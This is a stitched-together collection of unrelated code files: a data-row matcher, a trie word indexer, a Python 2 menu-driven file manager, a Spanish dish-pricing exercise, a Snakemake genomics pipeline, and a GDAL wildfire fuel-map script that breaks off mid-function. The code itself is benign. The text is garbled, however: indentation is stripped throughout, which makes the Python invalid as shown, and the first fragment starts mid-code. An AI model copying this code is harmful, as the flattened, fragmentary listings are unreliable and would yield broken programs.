with open("datasample2_parsed.txt","r") as f2:
for line2 in f2:
num2 = line2.split()
num2 = map(float,num2)
num2_set.append(num2)
num2_no_repeats = [ele for ind, ele in enumerate(num2_set) if ele not in num2_set[:ind]]
with open("spindown_result.txt","w") as f3:
for i in num1_no_repeats:
for j in num2_no_repeats:
if (abs(i[0]-j[0]) <= 0.0) and (abs(i[1]-j[1]) <=0.0):
f3.write("("+str(i[0])+", "+str(i[1])+", "+str(i[2])+")\t("+str(j[0])+", "+str(j[1])+", "+str(j[2])+")\n")
'''
if cmpare(num2,prev)==False:
#print "num2: ",num2
if (abs(num1[1]-num2[1]) <= 0.0) and (abs(num1[2]-num2[2]) <= 0.0):
f3.write("("+str(num1[0])+", "+str(num1[1])+", "+str(num1[2])+")"+'\t'+"("+str(num1[0])+", "+str(num1[1])+", "+str(num1[2])+")"+'\n')
prev = num2
'''
|
import os
from trie import Trie, _iter_nonempty
from string import Template, ascii_lowercase
from itertools import zip_longest
def escape(word):
word = word.lower()
encoded = ''
for char in word:
if char.isalnum():
encoded += char
else:
encoded += '-' + str(ord(char)) + '-'
return encoded
def unescape(word):
sections = word.split('-')
decoded = ''
plain = True
for s in sections:
if plain:
decoded += s
else:
decoded += chr(int(s))
plain = not plain
return decoded
### READ ALL CHAPTERS ###
chap_i, page_i = 1, 1
filetemp = Template('ch$c/p$p.txt')
index = Trie()
while True:
while os.path.isfile(filetemp.substitute(c=chap_i, p=page_i)):
with open(filetemp.substitute(c=chap_i, p=page_i),encoding='utf-8') as file:
word_i = 1
for line in file:
for word in line.split():
index.setdefault(word, []).append((chap_i, page_i, word_i))
word_i += 1
page_i += 1
if page_i == 1:
break
print('Found chapter', chap_i, 'containing', page_i-1, 'pages', flush=True)
chap_i += 1
page_i = 1
print('Total words found:', len(index), flush=True)
### SCAN EXISTING INDEX, DELETE AS APPROPRIATE ###
os.makedirs('index', exist_ok=True)
os.chdir('index')
ex_files = {}
removed = 0
for ex_folder in os.listdir():
if not os.path.isdir(ex_folder):
print('Odd file found in index:', ex_folder, flush=True)
else:
ex_files[ex_folder] = os.listdir(ex_folder)
files_left = False
for ex_file in ex_files[ex_folder]:
if unescape(ex_file[:-4]) not in index:
os.remove(ex_folder + '/' + ex_file)
removed += 1
else:
files_left = True
if not files_left:
os.rmdir(ex_folder)
print(removed, 'file(s) culled', flush=True)
### UPDATE/CREATE INDEX FILES ###
updated, created = 0, 0
for letter, basenode in index._root.next.items():
if letter in ascii_lowercase:
folder = letter
else:
folder = '0'
for node in _iter_nonempty(basenode):
word, positions = node.key, node.value
filecontent = [','.join(str(x) for x in pos) for pos in positions]
filename = escape(word) + '.txt'
if folder in ex_files and filename in ex_files[folder]:
ex_file = open(folder + '/' + filename,encoding='utf-8')
i = 0
for line in ex_file:
if i >= len(filecontent) or line.strip() != filecontent[i]:
ex_file.close()
break
i += 1
else:
ex_file.close()
if i == len(filecontent):
continue
updated += 1
else:
created += 1
os.makedirs(folder, exist_ok=True)
with open(folder + '/' + filename,mode='w',encoding='utf-8') as indexFile:
for line in filecontent:
print(line, file=indexFile)
os.chdir(os.pardir)
print(created, 'file(s) created', flush=True)
print(updated, 'file(s) updated', flush=True)
### UPDATE/CREATE SUGGESTION FILES ###
os.makedirs('suggest', exist_ok=True)
os.chdir('suggest')
def build_suggest(node):
global removed, updated, created
# Print progress
build_suggest.progress += 1
percent = (100 * build_suggest.progress) // index.num_nodes()
if percent >= build_suggest.next_milestone:
print(percent, '%', sep='', flush=True)
build_suggest.next_milestone += 10
# Output file for this node
needwrite = False
if os.path.isfile('s.txt'):
with open('s.txt', encoding='utf-8') as file:
for ex_word, new_word in zip_longest(file, node.suggest):
if not ex_word:
needwrite = True
updated += 1
break
ex_word = ex_word.strip()
if len(ex_word) != 0 and ex_word != new_word[0]:
needwrite = True
updated += 1
break
else:
needwrite = True
created += 1
if needwrite:
with open('s.txt', mode='w', encoding='utf-8') as file:
for word in node.suggest:
print(''.join(word[0]), file=file)
# Check subfolders
for entry in os.scandir():
if entry.is_dir() and unescape(entry.name) not in node.next:
for root, dirs, files in os.walk(entry.name, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
removed += 1
for name in dirs:
os.rmdir(os.path.join(root, name))
elif entry.is_file() and entry.name != 's.txt':
os.remove(entry.name)
removed += 1
# Recurse
for letter, n in node.next.items():
folder = escape(letter)
os.makedirs(folder, exist_ok=True)
os.chdir(folder)
build_suggest(n)
os.chdir(os.pardir)
index.gensuggestions(10)
print('Building suggestions: 0%', flush=True)
removed, updated, created = 0, 0, 0
build_suggest.progress, build_suggest.next_milestone = 0, 10
build_suggest(index._root)
print(removed, 'file(s) culled', flush=True)
print(created, 'file(s) created', flush=True)
print(updated, 'file(s) updated', flush=True)
print('Finished building index')
|
import os
import shutil
def create():
path = raw_input("enter the path where u want to create a file: ") # location of file
try:
os.chdir(path) # changing directory
except OSError: ## error handling in case of that directory does nit exist
print "No such directory"
else:
name = raw_input("give a name to a file:") # to give a name to a file
if name not in os.listdir(path): # to check if the name is unique
open(name, "w") # creating file by opening it in write mode
print "DONE SUCCESFULLY!!!"
else:
print "there is a file in this directory with the same name"
##############################################################################
def delete():
path = raw_input("enter the location:") # location of file
try:
os.chdir(path) # going to that directory
except OSError: ## error handling in case of that directory does not exist
print "No such directory"
else:
filename = raw_input("enter filename u want to delete:") # entering the name of file
if filename in os.listdir(path):
os.remove(filename) # removing file
print "DONE SUCCESFULLY!!!"
else: # error handling if the file does not exist
print "No such file"
############################################################################
def rename():
path = raw_input("enter the location:") # location of file
try:
os.chdir(path) # going to that directory
except OSError: ## error handling in case of that directory does not exist
print "No such directory"
else:
filename = raw_input("enter filename u want to change:") # current filename
if filename in os.listdir(path):
new = raw_input("enter new filename:") # new filename
if new not in os.listdir(path):
os.rename(filename, new) # renaming the file
print "DONE SUCCESFULLY!!!"
else:
print "there is a file in this directory with the same name"
else: # error handling if the file does not exist
print "No such file"
############################################################################
def copy():
source = raw_input("enter the location of file u want to copy:") # location of file
try:
os.chdir(source) # going to that directory
except OSError: ## error handling in case of that directory does not exist
print "No such directory"
else:
filename = raw_input("enter the name of file u want to copy:") # entering filename
if filename in os.listdir(source):
dest = raw_input("Enter the destination/destination and filename/filename:") # location of the copied file
try:
shutil.copy(filename, dest) # copying the file to its new location
print "DONE SUCCESFULLY!!!"
except shutil.Error: # error handling in case the directry is not changed and the new name is not given
print "You are trying to copy the file in the same directory but without giving a name"
except IOError: # error handling if directory does not exist
print "No such directory"
else:
print "No such file"
############################################################################
def move():
source = raw_input("enter the location of file u want to move:")# location of file
try:
os.chdir(source) # going to that directory
except OSError: # error handling in case that dorectory does not exist
print "No such directory"
else:
filename = raw_input("enter the name of file:") # entering the name of the file
dest = raw_input("enter the directory u want to move to:") # the new location of the file
try:
shutil.move(filename, dest) # moving file
print "DONE SUCCESFULLY!!!"
except IOError: # error handling if the directory or the file does not exist
print "No such file or directory"
#############################################################################
def append():
source = raw_input("enter the location of text file:") # location of text file
try:
os.chdir(source) # going to that location
except OSError: # error handling if the directory does not exist
print "No such directory"
else:
filename = raw_input("Enter the name of textfile:") # entering name of the textfile
try:
file = open(filename, "r+") # opening that file in read+ mode. read+ mode allows the user append to the textfile
except IOError: # error handling if the fil e does not exist
print "There is no such file in the directory"
else:
str = raw_input("type what u want to append to the textfile:") # entering words or sentences that user wants to add to the text file
file.write(str) # writing to a textfile
file.close() # closing a textfile
print "DONE SUCCESFULLY!!!"
#############################################################################
def insert_to_spec_pos():
source = raw_input("Enter a location of filename:") # location of text file
try:
os.chdir(source)# going to that location
except OSError:# error handling if the directory does not exist
print "No such directory"
else:
txt = raw_input("enter name of txt file:") # name of textfile
try:
file = open(txt, "r+")# opening textfile in read+ mode
except IOError: # error handling if the file does not exist
print "No such file in the directory"
else:
str = raw_input("add text:") # text addition by user
position = input("insert position with an integer:") # desired postion where the user wants to make an addition
if type(position) == int: # to check if the position is integer or not
start = file.read(position) # taking the first part of textfile until specified postion
file.seek(position, 0) # changing cursor place to the specified position
end = file.read() # taing the second part of textfile which is after specified position
file.close() # closing file
file = open(txt, "w") # opening the file again in write mode. write mode delete the content of textfile and we rewrite the text file
file.write(start) # writing the first part of textfile
file.write(" "+str+" ") # writing addition by user to the textfile
file.write(end) # second part of textfile
file.close() # closing textfile
print "DONE SUCCESFULLY!!!"
else:
print "position should be specified with an integer"
###################################################################
def remove_content_of_textfile():
source = raw_input("enter the location of text file:") # location of textfile
try:
os.chdir(source) # going to that directory
except OSError: #error handling if the directory does not exist
print "No such directory"
else:
filename = raw_input("Enter the name of textfile:") # enetring the name of file
if filename in os.listdir(source): # to check if the file is in the directory
open(filename, 'w') # opening the textfile in write mode so the content of textfile will be deleted
print "DONE SUCCESFULLY!!!"
else:
print "No such file in directory"
#####################################################################
def show_content_per_page():
source = raw_input("Enter the location of text file:") # location of text file
try:
os.chdir(source) # going to that directory
except OSError: # error handling if the directory does not exist
print "No such directory"
else:
file = raw_input("enter the name of textfile:") # entering the name of textfile
try:
txt = open(file, "r") # opening the file in read mode
except IOError: # error handling if the file does not exist
print "No such file in the directory"
else:
page = input("specify the number of lines per page with an integer:") # specifying the number of lines per page
if type(page) == int: # to check if the page is an integer
list = [] # this list will contain the lines of textfile
for i in txt:
list.append(i.splitlines()) # adding lines of textfile to the list
index = 0 # we start from 0 index it means the first line of textfile
decision = "yes" # default value of decision which will help the user when he decides to continue reading lines or not
while decision == "yes": # if the decision is yes the next commands will be executed
for i in range(page): # page is the number of lines per page specified by the user, so this loop will iterate "page" times
if index<len(list): # index has to be less than lenght of the list
var = str(list[index][0]) # var is the line in the textfile according to the index number
print var # printing that line
index+=1 # increasing counter so that we pass to the next line in the textfile
if index == len(list): # if the index is equal to the length of the list it means that line is the last line in the textfile
print "it is the last line"
break
decision = raw_input("type yes if you want to continue, if not type something else:") # the decision whether the user wants to continue reading or not
else:
print "page shpuld be specified with an integer"
###################################################################
def pofm():
x= raw_input("Available operations:\n1)create()\n2)delete()\n3)rename()\n4)copy()\n5)move()\n6)append()\n7)insert_to_spec_pos()\n8)remove_content_of_textfile()\n9)show_content_per_page()\nTo use any operation type corresponding number\nIf you want to get a help for any of the operations shown above type corresponding number and slash help,i.e(1/help):")
if x=="1":
create()
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x== "1/help":
print("With this function you can easily create a file in any directory by entering directory and file name. You cannot create the second file with the same name in the same directory")
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x=="2":
delete()
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x== "2/help":
print("You can use this operation to delete any file in any directory")
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x=="3":
rename()
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x== "3/help":
print("Choose this operation to rename a file in a chosen directory.")
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x=="4":
copy()
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x== "4/help":
print("With this function you can create a copy of chosen file either in the same directory but with different name or in the other directory with the same name or a different one.\nTo create in the same directory you only need to enter filename,\nto create in the other directory you can either give path or path with filename.")
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x=="5":
move()
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x== "5/help":
print("You can change a location of file with this function. But if you give just filename when the program wants a destination from you, it will not change directory and the name of file will be changed.\nYou need to give path to move a file!")
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x=="6":
append()
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x== "6/help":
print("To append a text to the end of any text file, you just need to give location and name of that file")
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x=="7":
insert_to_spec_pos()
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x== "7/help":
print("Let's say you want to add text to the text file for example after first 15 characters, not to the beginning or the end. This function will do it for you. You need to enter the location, the name of text file and the the number of characters that you want to insert after.")
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x=="8":
remove_content_of_textfile()
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x== "8/help":
print("Enter the location and the name of text file and delete whatever in it.")
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x=="9":
show_content_per_page()
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
if x== "9/help":
print("You can divide text file into pages by defining line count per page and to vies that text file page by page")
y=raw_input("Do you want to continue (yes) or (no):")
if y == "yes":
pofm()
else:
print "See you later :)"
pofm()
|
def get_platos_y_dinero():
"""Funcion que obtiene el numero de platos y el dienro a gastar"""
platos = input("Cuantos platos se sirven hoy? ")
dinero_disponible = input("Cuanto dinero va a gastar?: ")
return platos, dinero_disponible
prices = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512] # creo una lista con los precios para luego usarla en el bucle principal de este programa
platos, dinero_disponible = get_platos_y_dinero()
total_platos = 0
for i in reversed(prices[0:platos]): # No preocupa que el programa se pase del indice de la lista de precios pues no va a dar ningun traceback error
while dinero_disponible/i > 0:
total_platos += dinero_disponible/i
dinero_disponible -= i*(dinero_disponible/i)
print "Numero de platos:", total_platos
|
#####################################################
## samples.tsv
# sample assembly descriptive_name cell
# CMC_ATAC hg38 CMC_ATAC CMC
# CMC_H3K27ac hg38 CMC_H3K27ac CMC
# KRT_p300 hg38 KRT_p300 KRT
#####################################################
## Snakefile
import os
import pandas as pd
configfile: "config.yaml"
# do onstart/onexit things
sample_schemas = ['sample', 'assembly', 'strandedness', 'condition']
config_schemas = ['general', 'download', 'alignment_general', 'peakcalling', 'trackhub']
include: "../../rules/configuration.smk"
# load all the relevant rules
include: f"{config['rule_dir']}/alignment.smk"
include: f"{config['rule_dir']}/call_peak.smk"
include: f"{config['rule_dir']}/get_genome.smk"
include: f"{config['rule_dir']}/get_fastq.smk"
include: f"{config['rule_dir']}/merge_replicates.smk"
include: f"{config['rule_dir']}/peak_count.smk"
include: f"{config['rule_dir']}/qc.smk"
include: f"{config['rule_dir']}/trackhub.smk"
include: f"{config['rule_dir']}/trimming.smk"
include: f"{config['rule_dir']}/pananse.smk"
# set the quality_control functions
quality_control = [get_trimming_qc, get_alignment_qc, get_peak_calling_qc]
rule call_enahncer_all:
"""
call enahncers for each sample (or condition if applies)
"""
input:
expand((["{result_dir}/trackhub"] if config['create_trackhub'] else []) +
(["{qc_dir}/multiqc_{assemblies}.html"] if config["create_qc_report"] else []) +
["{result_dir}/enhancer/{assemblies}-{cell}_enahncer.bed"],
**{**config,
**{'assemblies': set(samples['assembly']), 'peak_caller': config['peak_caller'].keys(), 'cell': set(samples.cell)}})
#####################################################
## Code in pananse.smk
import os
## How can I merge sort_bdg_p300 and sort_bdg_h2k27ac
rule sort_bdg_p300:
"""
Sort bdg file from macs2.
"""
input:
bdgfile = expand("{result_dir}/macs2/{{assembly}}-{{cell}}_p300_treat_pileup.bdg", **config)
output:
sortbdgfile = expand("{result_dir}/tmp/{{assembly}}-{{cell}}_sort.bdg", **config)
shell:
"sort -k1,1 -k2,2n {input.bdgfile} > {output.sortbdgfile}"
rule sort_bdg_h3k27ac:
"""
Sort bdg file from macs2.
"""
input:
bdgfile = expand("{result_dir}/macs2/{{assembly}}-{{cell}}_H3K27ac_treat_pileup.bdg", **config)
output:
sortbdgfile = expand("{result_dir}/tmp/{{assembly}}-{{cell}}_sort.bdg", **config)
shell:
"sort -k1,1 -k2,2n {input.bdgfile} > {output.sortbdgfile}"
rule bdg2wig:
"""
Switch bdg file to wig file.
"""
input:
sortbdgfile = expand("{result_dir}/tmp/{{assembly}}-{{cell}}_sort.bdg", **config),
genome_size = expand("{genome_dir}/{{assembly}}/{{assembly}}.fa.sizes", **config)
output:
wigfile = expand("{result_dir}/tmp/{{assembly}}-{{cell}}.wig", **config)
conda:
"../envs/pananse.yaml"
shell:
"bedGraphToBigWig {input.sortbdgfile} {input.genome_size} {output.wigfile}"
rule rename_peak_atac:
input:
narrowpeak_atac = expand("{result_dir}/macs2/{{assembly}}-{{cell}}_ATAC_peaks.narrowPeak", **config)
output:
narrowpeak = expand("{result_dir}/tmp/{{assembly}}-{{cell}}_peaks.narrowPeak", **config)
shell:
"mv {input.narrowpeak_atac} {output.narrowpeak}"
rule rename_peak_p300:
input:
narrowpeak_p300 = expand("{result_dir}/macs2/{{assembly}}-{{cell}}_p300_peaks.narrowPeak", **config)
output:
narrowpeak = expand("{result_dir}/tmp/{{assembly}}-{{cell}}_peaks.narrowPeak", **config)
shell:
"mv {input.narrowpeak_p300} {output.narrowpeak}"
def read_chrsize(sizefile):
sdic = {}
with open (sizefile) as sizes:
for chrom in sizes:
sdic[chrom.split()[0]] = int(chrom.split()[1])
return sdic
rule make_enhancer:
input:
narrowpeak = expand("{result_dir}/tmp/{{assembly}}-{{cell}}_peaks.narrowPeak", **config),
wigfile = expand("{result_dir}/tmp/{{assembly}}-{{cell}}.wig", **config),
genome_size = expand("{genome_dir}/{{assembly}}/{{assembly}}.fa.sizes", **config)
output:
enhancerbed = expand("{result_dir}/enhancer/{{assembly}}-{{cell}}_enahncer.bed", **config)
# conda:
# "../envs/pananse.yaml"
run:
chrsizedic = read_chrsize(input.genome_size[0])
with open(str(input.narrowpeak)) as bdgf, open(str(output.enhancerbed),"w") as enh_bed:
for line in bdgf:
a = line.split()
peak = int(a[9]) + int(a[1])
start = peak - 100
end = peak + 100
if start>0 and chrsizedic[a[0]]>end:
commd = "/home/qxu/bin/ucsc/bigWigSummary -type=max {wig} {chrname} {start} {end} 1".format(wig=str(input.wigfile), chrname=a[0], start=start, end=end)
commd_result = os.popen(commd)
r = commd_result.read()
if r != "":
enh_bed.write("{chrname}\t{start}\t{end}\t{score}".format(chrname=a[0], start=start, end=end, score=str(r)))
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 11 14:41:16 2018
@author: JHodges
"""
import geopandas as gpd
import matplotlib.pyplot as plt
import gdal
import skimage.transform as skt
import numpy as np
from generate_dataset import GriddedMeasurement
import scipy.interpolate as scpi
import behavePlus as bp
import os
import glob
import struct
import matplotlib.path as mpltPath
from shapely.geometry import Polygon, Point
import datetime
import subprocess
def readImgFile(imgFile):
img = gdal.Open(imgFile)
band = np.array(img.ReadAsArray(),dtype=np.float32)
band[band<0] = np.nan
old_cs = gdal.osr.SpatialReference()
old_cs.ImportFromWkt(img.GetProjectionRef())
wgs84_wkt = """
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.01745329251994328,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]]"""
new_cs = gdal.osr.SpatialReference()
new_cs.ImportFromWkt(wgs84_wkt)
print(old_cs)
print(new_cs)
transform = gdal.osr.CoordinateTransformation(old_cs,new_cs)
width = img.RasterXSize
height = img.RasterYSize
gt = img.GetGeoTransform()
x = np.linspace(0,width,width+1)
y = np.linspace(0,height,height+1)
x = gt[0] + x*gt[1]
y = gt[3] + y*gt[5]
xGrid, yGrid = np.meshgrid(x,y)
ds = 5
xGridDs = xGrid[::ds,::ds]
yGridDs = yGrid[::ds,::ds]
bandDs = band[::ds,::ds]
sz = xGridDs.shape
xGrid_rs = np.reshape(xGridDs,(xGridDs.shape[0]*xGridDs.shape[1],))
yGrid_rs = np.reshape(yGridDs,(yGridDs.shape[0]*yGridDs.shape[1],))
points = np.array([xGrid_rs,yGrid_rs]).T
print(points[0])
latlong = np.array(transform.TransformPoints(points))
print(latlong[0])
#assert False, "Stopped"
lat = np.reshape(latlong[:,1],(sz[0],sz[1]))
lon = np.reshape(latlong[:,0],(sz[0],sz[1]))
return bandDs, lat, lon
#data, lat, lon = gridAndResample(bandDs,lat,lon)
#data2 = GriddedMeasurement(None,lat,lon,data,'FuelModel')
#data2.dataName = 'FuelModel'
#return data2
def getExtents(imgFile):
img = gdal.Open(imgFile)
#band = np.array(img.ReadAsArray(),dtype=np.float32)
#band[band<0] = np.nan
old_cs = gdal.osr.SpatialReference()
print(img.GetProjectionRef())
old_cs.ImportFromWkt(img.GetProjectionRef())
wgs84_wkt = """
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.01745329251994328,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]]"""
new_cs = gdal.osr.SpatialReference()
new_cs.ImportFromWkt(wgs84_wkt)
transform = gdal.osr.CoordinateTransformation(old_cs,new_cs)
width = img.RasterXSize
height = img.RasterYSize
gt = img.GetGeoTransform()
x = np.linspace(0,width,width+1)
y = np.linspace(0,height,height+1)
x = gt[0] + x*gt[1]
y = gt[3] + y*gt[5]
xGrid, yGrid = np.meshgrid(x,y)
ds = 5
xGridDs = xGrid[::ds,::ds]
yGridDs = yGrid[::ds,::ds]
bandDs = band[::ds,::ds]
sz = xGridDs.shape
xGrid_rs = np.reshape(xGridDs,(xGridDs.shape[0]*xGridDs.shape[1],))
yGrid_rs = np.reshape(yGridDs,(yGridDs.shape[0]*yGridDs.shape[1],))
points = np.array([xGrid_rs,yGrid_rs]).T
latlong = np.array(transform.TransformPoints(points))
lat = np.reshape(latlong[:,1],(sz[0],sz[1]))
lon = np.reshape(latlong[:,0],(sz[0],sz[1]))
return bandDs, lat, lon
def splitImages(inDirs=None,namespace=None):
if inDirs is None:
inDirs = ['E:/projects/wildfire-research/landfireData/US_140FBFM40/1/',
'E:/projects/wildfire-research/landfireData/US_140FBFM40/2/',
'E:/projects/wildfire-research/landfireData/US_140FBFM40/3/',
'E:/projects/wildfire-research/landfireData/US_140FBFM40/4/']
if namespace is None:
namespace = 'US_140FBFM40'
for inDir in inDirs:
files = glob.glob(inDir+namespace+'.tif')
for file in files:
img = gdal.Open(file)
old_cs = gdal.osr.SpatialReference()
old_cs.ImportFromWkt(img.GetProjectionRef())
gt = img.GetGeoTransform()
width = img.RasterXSize
height = img.RasterYSize
minX = gt[0]
maxX = gt[0] + width*gt[1]
minY = gt[3]
maxY = gt[3] + height*gt[5]
halfX = (maxX+minX)/2
halfY = (maxY+minY)/2
cmd = "gdal_translate.exe %s%s.tif %s%s_ul.tif -projwin %.3f %.3f %.3f %.3f"%(inDir,namespace,inDir,namespace,minX,minY,halfX,halfY)
os.system(cmd)
cmd = "gdal_translate.exe %s%s.tif %s%s_ur.tif -projwin %.3f %.3f %.3f %.3f"%(inDir,namespace,inDir,namespace,halfX,minY,maxX,halfY)
os.system(cmd)
cmd = "gdal_translate.exe %s%s.tif %s%s_dl.tif -projwin %.3f %.3f %.3f %.3f"%(inDir,namespace,inDir,namespace,minX,halfY,halfX,maxY)
os.system(cmd)
cmd = "gdal_translate.exe %s%s.tif %s%s_dr.tif -projwin %.3f %.3f %.3f %.3f"%(inDir,namespace,inDir,namespace,halfX,halfY,maxX,maxY)
os.system(cmd)
def generateLatLonImgs(file,outDir,namespace,debug=False):
img = gdal.Open(file)
band = np.array(img.ReadAsArray(),dtype=np.float32)
#band[band<0] = -1
old_cs = gdal.osr.SpatialReference()
old_cs.ImportFromWkt(img.GetProjectionRef())
wgs84_wkt = """
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.01745329251994328,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]]"""
print(img.GetProjectionRef())
assert False, "Stopped"
new_cs = gdal.osr.SpatialReference()
new_cs.ImportFromWkt(wgs84_wkt)
transform = gdal.osr.CoordinateTransformation(old_cs,new_cs)
iTf = gdal.osr.CoordinateTransformation(new_cs,old_cs)
width = img.RasterXSize
height = img.RasterYSize
gt = img.GetGeoTransform()
x = np.linspace(0,width,width)
y = np.linspace(0,height,height)
x = gt[0] + x*gt[1]
y = gt[3] + y*gt[5]
if debug:
xGrid, yGrid = np.meshgrid(x,y)
sz = xGrid.shape
xGrid_rs = np.reshape(xGrid,(xGrid.shape[0]*xGrid.shape[1],))
yGrid_rs = np.reshape(yGrid,(yGrid.shape[0]*yGrid.shape[1],))
points = np.array([xGrid_rs,yGrid_rs]).T
latlong = np.array(transform.TransformPoints(points))[:,:-1]
lat = np.reshape(latlong[:,1],(sz[0],sz[1]))
lon = np.reshape(latlong[:,0],(sz[0],sz[1]))
points = np.array(transform.TransformPoints([[x.min(),y.min()],[x.min(),y.max()],[x.max(),y.min()],[x.max(),y.max()]]))
lat_b = np.ceil(np.min(points[:,1]))
lat_u = np.floor(np.max(points[:,1]))
lon_l = np.ceil(np.min(points[:,0]))
lon_r = np.floor(np.max(points[:,0]))
resX = 3700
resY = 3700
interpFunction = scpi.RegularGridInterpolator((-1*y,x),band,bounds_error=False,fill_value=-9999,method='nearest')
driver = gdal.GetDriverByName('GTiff')
for i in range(0,int(lat_u-lat_b)):
for j in range(0,int(lon_r-lon_l)):
latMin = lat_b+float(i)
lonMin = lon_l+float(j)
yNew = np.linspace(latMin,latMin+1,resY)
xNew = np.linspace(lonMin,lonMin+1,resX)
yNewGrid, xNewGrid = np.meshgrid(yNew,xNew)
xNewGrid_rs = np.reshape(xNewGrid,(xNewGrid.shape[0]*xNewGrid.shape[1],))
yNewGrid_rs = np.reshape(yNewGrid,(yNewGrid.shape[0]*yNewGrid.shape[1],))
points2 = np.array([xNewGrid_rs,yNewGrid_rs]).T
ipoints2 = np.array(iTf.TransformPoints(points2))[:,:-1]
ipoints2swap = np.array([ipoints2[:,1],ipoints2[:,0]]).T
dataPoints_rs = interpFunction((-1*ipoints2swap[:,0],ipoints2swap[:,1]))
dataPoints = np.reshape(dataPoints_rs,(resX,resY)).T
if latMin < 0:
latStr = 'n%.0f'%(abs(latMin))
else:
latStr = '%.0f'%(abs(latMin))
if lonMin < 0:
lonStr = 'n%.0f'%(abs(lonMin))
else:
lonStr = '%.0f'%(abs(lonMin))
name = outDir+namespace+'_%s_%s'%(latStr,lonStr)
if len(glob.glob(name+'.tif')) > 0:
img2 = gdal.Open(name+'.tif')
band2 = np.array(img2.ReadAsArray(),dtype=np.float32)
dataPoints = dataPoints[::-1]
band2[band2 == -9999] = dataPoints[band2 == -9999]
dataPoints = band2[::-1]
print("Found: %s, Merging."%(name))
else:
print("\tMaking %s"%(name))
dataset = driver.Create(
name+'.tif',
resX,
resY,
1,
gdal.GDT_Float32, )
dataset.SetGeoTransform((
lonMin,
1/resX,
0,
latMin+1,
0,
-1/resY))
dataset.SetProjection(wgs84_wkt)
dataset.GetRasterBand(1).WriteArray(dataPoints[::-1,:])
dataset.FlushCache()
if debug:
plt.figure(figsize=(12,8))
plt.subplot(1,2,1)
plt.contourf(xNew,yNew,dataPoints); plt.clim([90,210]); plt.colorbar();
plt.subplot(1,2,2)
plt.contourf(lon[::10,::10],lat[::10,::10],band[::10,::10]); plt.clim([90,210]); plt.colorbar(); plt.xlim([lon_l+float(j),lon_l+float(j)+1]); plt.ylim([lat_b+float(i),lat_b+float(i)+1]);
return dataPoints
def getHistogram(file):
img = gdal.Open(file)
band = np.array(img.ReadAsArray(),dtype=np.float32)
return band
def getTransformFromMtoD():
wgs84_wkt = """
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.01745329251994328,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]]"""
nad83_wkt = """
PROJCS["USA_Contiguous_Albers_Equal_Area_Conic_USGS_version",
GEOGCS["NAD83",
DATUM["North_American_Datum_1983",
SPHEROID["GRS 1980",6378137,298.2572221010042,
AUTHORITY["EPSG","7019"]],
AUTHORITY["EPSG","6269"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4269"]],
PROJECTION["Albers_Conic_Equal_Area"],
PARAMETER["standard_parallel_1",29.5],
PARAMETER["standard_parallel_2",45.5],
PARAMETER["latitude_of_center",23],
PARAMETER["longitude_of_center",-96],
PARAMETER["false_easting",0],
PARAMETER["false_northing",0],
UNIT["metre",1,AUTHORITY["EPSG","9001"]]]"""
new_cs = gdal.osr.SpatialReference()
new_cs.ImportFromWkt(wgs84_wkt)
old_cs = gdal.osr.SpatialReference()
old_cs.ImportFromWkt(nad83_wkt)
Tf = gdal.osr.CoordinateTransformation(old_cs,new_cs)
iTf = gdal.osr.CoordinateTransformation(new_cs,old_cs)
return Tf, iTf
def readAscFile(file,lat,lon,distance,debug=False):
with open(file,'r') as f:
lines = f.readlines()
nCols = float(lines[0].split(' ')[-1].split('\n')[0])
nRows = float(lines[1].split(' ')[-1].split('\n')[0])
